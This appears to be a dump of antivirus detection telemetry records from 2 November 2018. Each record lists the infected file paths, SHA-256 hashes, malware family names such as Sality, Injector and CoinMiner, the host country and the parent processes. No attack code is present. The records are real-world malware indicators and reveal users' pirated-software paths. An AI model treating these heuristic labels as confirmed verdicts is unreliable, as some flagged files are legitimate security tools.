  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-145027-87c1691e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1d49012a\\AVSCAN-20181102-141921-2C2A12A5\\AVSCAN-20181102-145027-87C1691E', filesize=192000, name='BDS/Androm.EB.73.#M1.#R1'), hash='5f17703ba5daa3a0d89ebcf8edc87f7035aac00d53945e9d0068ac46f5e267d6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:20:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gabungan.exe', filepath='D:\\DOKUMENKU\\GABUNG NOM TABUNGAN\\GABUNGAN\\GABUNGAN.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:47:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00043baa', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp00043baa', filesize=21504000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='49dcb73d7b90e9a5fdc66a13c22a07e85376d2ce61573362eb0b34e7ac49a875', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T05:23:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='50c1ae6d2e294.ocx', filepath='C:\\ProgramData\\SaveAs\\50c1ae6d2e294.ocx', filesize=128000, name='ADWARE/Adware.Gen.#M2.#R4876'), hash='4f2c543edd9f54151ae962e25b743ac11b649e68ab9bcb8a66c0c5202edc2f7f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T15:25:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='520e3c8f7324d3f7bb3f4d280373441d1f1a1540dd9b8f5eacc31fe59a393bb3', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-27\\520E3C8F7324D3F7BB3F4D280373441D1F1A1540DD9B8F5EACC31FE59A393BB3', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='520e3c8f7324d3f7bb3f4d280373441d1f1a1540dd9b8f5eacc31fe59a393bb3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:16:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181232-36552319', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b0a4534a\\AVSCAN-20181102-181203-32F2B3AB\\AVSCAN-20181102-181232-36552319', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T16:12:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1af0128ee50ef35648af4037eaa25482a5787113dff2480b798c1dcb78d285bf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1AF0128EE50EF35648AF4037EAA25482A5787113DFF2480B798C1DCB78D285BF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1af0128ee50ef35648af4037eaa25482a5787113dff2480b798c1dcb78d285bf', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:33:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-08-03-29.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-11-01T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T09:13:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1af0128ee50ef35648af4037eaa25482a5787113dff2480b798c1dcb78d285bf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1AF0128EE50EF35648AF4037EAA25482A5787113DFF2480B798C1DCB78D285BF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1af0128ee50ef35648af4037eaa25482a5787113dff2480b798c1dcb78d285bf', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:27:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-07-05-09.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T17:15:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-08-03-29.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-11-01T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T08:13:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:20:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.496\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='GT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.496\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T00:07:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='new folder.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='afuwin.exe', filepath='E:\\Program Files\\ASUS\\AI Suite II\\ASUS Update\\Compal\\32\\afuwin.exe', filesize=336000, name='W32/Sality.AT.#M1.#R1'), hash='1b55afb78f6ef9b3a010aba4ffe52bb8ba2e4b4a198aa2537ddf40a47c4746d3', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:30:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libraries.pif', filepath='C:\\Users\\X\\Libraries\\Libraries.pif', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mhautopatch.exe', filepath='D:\\PC GAMER\\msoxh\\MHAutoPatch.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\msoxh3(1).zip\\\\\\"', country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1531856, timestamp='2018-11-02T00:38:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='abrites commander for psa.exe', filepath='\\\\?\\C:\\Program Files (x86)\\ABRITES software for ID 172243\\PSA\\ABRITES Commander for PSA.exe', filesize=92672000, name='HEUR/AGEN.1012527.#M1.#R1'), hash='08810113aa05e16e0e08bf44d1b069f97c2277c2f892be5a3f04a6b05fa61391', metadata=Row(cmdline=None, country='IE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:37:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='23682066ff16205715fe0965362f1f41e3d9b53bca40f9b1f530d14c8c6c1782.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.available\\Avira\\23682066FF16205715FE0965362F1F41E3D9B53BCA40F9B1F530D14C8C6C1782.VIR', filesize=300000, name='TR/ATRAPS.Gen2.#M300.#R100252'), hash='23682066ff16205715fe0965362f1f41e3d9b53bca40f9b1f530d14c8c6c1782', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T10:41:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005852-cfb22bfc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005852-CFB22BFC', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181940-fd60a755', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-181940-FD60A755', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:19:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-063413-7f000ea6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e2470e7c\\AVSCAN-20181102-063313-76DC990C\\AVSCAN-20181102-063413-7F000EA6', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:34:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\Downloads\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Downloads\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T06:42:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T20:55:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T10:06:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163034-eb59456a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5d787b0a\\AVSCAN-20181102-163011-E67B7CE9\\AVSCAN-20181102-163034-EB59456A', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:30:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053948-ae65c95c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053948-AE65C95C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061329-62f0c141', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061329-62F0C141', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085803-683254ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_94e64d75\\AVSCAN-20181102-085632-58407B3F\\AVSCAN-20181102-085803-683254AB', filesize=1536000, name='TR/CoinMiner.BW.#M1.#R1'), hash='51f89e3e19261fc1bfe1a4b1ecfa5c9cc4029d741c66d74629205faa41c57265', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:58:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dup2patcher.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\dup2patcher.dll', filesize=64000, name='TR/Kazy.64000.13.#M1.#R1'), hash='63cca7c71b7d914ec4cb900dea1c1de7e17481d8e9a3b1b1e87ca301df283f7e', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Wondershare__Filmora_Universal_Cr_ck_[TechYfied]\\Wondershare  Filmora Universal Crack[FreeIDMZone].exe', parentsize=324096, timestamp='2018-11-02T09:19:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050706-1cf5abbe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050706-1CF5ABBE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered notel', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered notel', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='66bf5e284a4da1edd06c0642be2278a0cafe63675b99bd29a587703cb431e6d7', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:52:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155112-8a169505', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-155112-8A169505', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:54:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa12308.3080\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa12308.3080\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T11:27:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062610-bb07ba1d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_06e72e7c\\AVSCAN-20181102-062545-B72298CA\\AVSCAN-20181102-062610-BB07BA1D', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:26:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050738-2ff60807', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050738-2FF60807', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:36Z'), dt=datetime.date(2018, 11, 2)),
